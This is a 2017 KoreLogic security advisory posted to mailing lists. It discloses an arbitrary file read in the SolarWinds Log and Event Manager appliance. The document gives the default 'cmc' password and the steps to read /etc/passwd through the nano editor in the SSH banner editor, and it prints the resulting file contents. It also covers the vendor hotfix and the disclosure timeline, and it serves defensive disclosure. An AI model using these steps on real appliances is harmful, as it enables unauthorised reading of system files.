KL-001-2017-008 : Solarwinds LEM Management Shell Arbitrary File Read

--mWr2PpNh0dHIQMt8j0hHaGT2869cqRNCw
Content-Type: multipart/mixed; boundary="fX3ugKESEwG49jWfCM8Foi0PtJ3kHm17p";
 protected-headers="v1"
From: KoreLogic Disclosures <disclosures@korelogic.com>
To: fulldisclosure@seclists.org, bugtraq@securityfocus.com
Message-ID: <a3e8db87-7296-cda2-5a28-94a3f8ab47b6@korelogic.com>
Subject: KL-001-2017-008 : Solarwinds LEM Management Shell Arbitrary File Read

--fX3ugKESEwG49jWfCM8Foi0PtJ3kHm17p
Content-Type: text/plain; charset=utf-8
Content-Language: en-US
Content-Transfer-Encoding: quoted-printable

KL-001-2017-008 : Solarwinds LEM Management Shell Arbitrary File Read

Title: Solarwinds LEM Management Shell Arbitrary File Read
Advisory ID: KL-001-2017-008
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-20=
17-008.txt


1. Vulnerability Details

     Affected Vendor: Solarwinds
     Affected Product: Log and Event Manager Virtual Appliance
     Affected Version: v6.3.1
     Platform: Embedded Linux
     CWE Classification: CWE-36: Absolute Path Traversal
     Impact: Information Disclosure
     Attack vector: SSH

2. Vulnerability Description

     The management shell allows the end user to edit the MOTD banner
     displayed during SSH logon. The editor provided for this is
     nano. This editor has a keyboard mapped function which lets
     the user import a file from the local file system into the
     editor. An attacker can abuse this to read arbitrary files
     within the allowed permissions.

3. Technical Description

     Should an attacker gain access to the SSH console for the
     cmc user, read access to files on the local filesystem can be
     achieved. The default password for the cmc user is "password".

     This is accomplished by abusing the editor selection for the
     MOTD banner edit functionality.

     $ ssh cmc@1.3.3.7
     Password:
     Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_=
64
     Last login: Sun Dec 11 11:35:29 2016 from 1.3.3.6
       //////////////////////////////////////////////////
       ///       SolarWinds Log & Event Manager       ///
       ///                   management console       ///
       //////////////////////////////////////////////////

     Detected VMware Virtual Platform
     Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
     Available commands:
       [ appliance ]  Network, System
       [ manager ]    Upgrade, Debug
       [ service ]    Restrictions, SSH, Snort
       [ ndepth ]     nDepth Configuration/Maintenance
         upgrade      Upgrade this Appliance
         admin        Run Admin UI (for better usability browse https://1=
=2E3.3.7/mvc/configuration)
         import       Import a file that can be used from the Admin UI
         help         display this help
         exit         Exit
     cmc > appliance
     Available commands:
         activate           Activate appliance features after licensing.
         checklogs          Check Appliance Logs for Remote Data
         clearsyslog        Clear Syslog Logs
         cleantemp          * Clean Up Temporary Files
         multimanagerconfig * Enable/disable multimanager
         dateconfig         Update Date and Time
         dbdiskconfig       * Configure database retention
         diskusage          Check Disk Usage of your Manager
         diskusageconfig    Set Disk Usage Limit of your Manager
         editbanner         Edit the SSH login banner.
         exportsyslog       Export System Logs
         hostname           Change the Manager Appliance hostname
         import             Import SIM/LEM Backup to LEM
         limitsyslog        Configure the syslog rotation limit (default:=
 50)
         setlogrotate       Configure the syslog rotation frequency (hour=
ly or daily)
         netconfig          Configure Network Parameters (IP Address, Net=
mask, DNS)
         ntpconfig          Update NTP Server Preferences
         password           Change the CMC User Password
         ping               Ping an IP address or hostname
         reboot             Reboot the Manager Appliance
         resetsystemmac     Reset the MAC address of the Appliance
         shutdown           Shut Down the Manager Appliance
         top                View Manager Appliance CPU/Memory Utilization=

         tzconfig           Update Time Zone information
         viewnetconfig      View Network Parameters (IP address, netmask,=
 DNS)
         exit               Return to main menu

         NOTE: Commands with an asterisk (*) include an automatic manager=
 service restart
     cmc::appliance > editbanner
     Press <enter> to configure the SSH banner.

     Once inside nano, ^R to get the screen below:

     File to insert [from ./] : /etc/passwd
     ^G Get Help
     ^C Cancel

     The result will be:

     root:x:0:0:root:/root:/bin/bash
     daemon:x:1:1:daemon:/usr/sbin:/bin/sh
     bin:x:2:2:bin:/bin:/bin/sh
     sys:x:3:3:sys:/dev:/bin/sh
     sync:x:4:65534:sync:/bin:/bin/sync
     games:x:5:60:games:/usr/games:/bin/sh
     man:x:6:12:man:/var/cache/man:/bin/sh
     lp:x:7:7:lp:/var/spool/lpd:/bin/sh
     mail:x:8:8:mail:/var/mail:/bin/sh
     news:x:9:9:news:/var/spool/news:/bin/sh
     uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
     proxy:x:13:13:proxy:/bin:/bin/sh
     www-data:x:33:33:www-data:/var/www:/bin/sh
     backup:x:34:34:backup:/var/backups:/bin/sh
     list:x:38:38:Mailing List Manager:/var/list:/bin/sh
     irc:x:39:39:ircd:/var/run/ircd:/bin/sh
     gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin=
/sh
     nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
     Debian-exim:x:102:102::/var/spool/exim4:/bin/false
     trigeo:x:1000:1000:trigeo,,,:/usr/local/contego/:/bin/bash
     sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
     postgres:x:101:104:PostgreSQL administrator,,,:/var/lib/postgres:/bi=
n/bash
     cmc:x:1001:1000:CMC,,,:/usr/local/contego/:/usr/local/contego/script=
s/mgrconfig.pl
     libuuid:x:105:107::/var/lib/libuuid:/bin/sh
     snort:x:103:105:Snort IDS:/var/log/snort:/bin/false
     messagebus:x:106:109::/var/run/dbus:/bin/false
     snmp:x:104:108::/var/lib/snmp:/bin/false
     lynx:x:1002:1003::/home/lynx:/bin/sh

4. Mitigation and Remediation Recommendation

     The vendor has released a Hotfix to remediate this
     vulnerability. Hotfix and installation instructions are
     available at:

     https://thwack.solarwinds.com/thread/111223

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     and Hank Leininger of KoreLogic, Inc.

6. Disclosure Timeline

     2017.02.16 - KoreLogic sends vulnerability report and PoC to
                  Solarwinds <psirt@solarwinds.com> using PGP key
                  with fingerprint
                  A86E 0CF6 9665 0C8C 8A7C  C9BA B373 8E9F 951F 918F.
     2017.02.20 - Solarwinds replies that the key is no longer in
                  use, requests alternate communication channel.
     2017.02.22 - KoreLogic submits vulnerability report and PoC to
                  alternate Solarwinds contact.
     2017.02.23 - Solarwinds confirms receipt of vulnerability
                  report.
     2017.04.06 - 30 business days have elapsed since Solarwinds
                  acknowledged receipt of vulnerability details.
     2017.04.11 - Solarwinds releases hotfix and public disclosure.
     2017.04.24 - KoreLogic public disclosure.

7. Proof of Concept

     See 3. Technical Description


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Polic=
y.v2.2.txt


--fX3ugKESEwG49jWfCM8Foi0PtJ3kHm17p--

--mWr2PpNh0dHIQMt8j0hHaGT2869cqRNCw
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----

iQFOBAEBCAA4FiEE+cSrtp5jQJEtra70TWWaLA4ZiQwFAlj+Zb8aHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQTWWaLA4ZiQzi5wf/Z0ZwDCejTAhR+/0nuRbK
tceVwNeUQ7bAG2iSo/JTZoShZcjqZusBHeoJX/SCdV5LD0sr0dGkmoqo7OEmjqUO
tONb8R6fcYGFOfVXGxc99eHHlSzz5VXc1PEfDH9hxKvAfCt9KWTrAEOdCcOcRoY3
A/BbMGiEnvCJzZPOdMcGFo911TPM1b5Kdll22p9M2BXYitev8KsNjHhN+TW0/9Qm
gB7TlFspB4z+1eF3wEWuLZDez0v8omR2pbw6BQyB1x/SkLc0lhJZdeBwIwnMIcbg
23qrb7KLM5ASB6qyvyR2Jkr8MMAaSdMNL3QxbOHwzukUK7huLr+Nw2qZMMPzHgPn
fQ==
=b7Y6
-----END PGP SIGNATURE-----

--mWr2PpNh0dHIQMt8j0hHaGT2869cqRNCw--